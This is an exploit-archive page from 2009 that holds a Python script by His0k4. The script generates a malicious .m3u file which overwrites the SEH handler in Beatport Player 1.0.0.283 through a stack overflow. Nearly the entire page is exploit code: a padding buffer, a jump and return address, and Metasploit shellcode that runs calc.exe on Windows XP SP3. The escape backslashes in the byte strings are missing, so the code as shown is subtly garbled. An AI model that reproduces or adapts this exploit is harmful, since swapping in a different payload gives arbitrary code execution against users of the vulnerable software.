Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit
# Published : 2009-05-01
# Author : His0k4
# Previous Title : RM Downloader (.smi File) Local Stack Overflow Exploit
# Next Title : Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #2

#usage: exploit.py
# Grab the exploit file into the program
print "**************************************************************************"
print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploitn"
print " Refer: http://www.milw0rm.com/exploits/8588n"
print " Exploit code: His0k4n"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " greetz: TO ELITE ALGERIANS,snakespc.comn"
print "**************************************************************************"
         	
			
buff = "x41" * 1232
next_seh = "xEBx06x90x90"
seh = "xB8x15xD1x72" #msacm32.drv

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe8"
"x61xfbx36x83xebxfcxe2xf4x14x89xbfx36xe8x61x70x73"
"xd4xeax87x33x90x60x14xbdxa7x79x70x69xc8x60x10x7f"
"x63x55x70x37x06x50x3bxafx44xe5x3bx42xefxa0x31x3b"
"xe9xa3x10xc2xd3x35xdfx32x9dx84x70x69xccx60x10x50"
"x63x6dxb0xbdxb7x7dxfaxddx63x7dx70x37x03xe8xa7x12"
"xecxa2xcaxf6x8cxeaxbbx06x6dxa1x83x3ax63x21xf7xbd"
"x98x7dx56xbdx80x69x10x3fx63xe1x4bx36xe8x61x70x5e"
"xd4x3excaxc0x88x37x72xcex6bxa1x80x66x80x91x71x32"
"xb7x09x63xc8x62x6fxacxc9x0fx02x9ax5ax8bx61xfbx36")

exploit = buff + next_seh + seh + shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2009-05-01]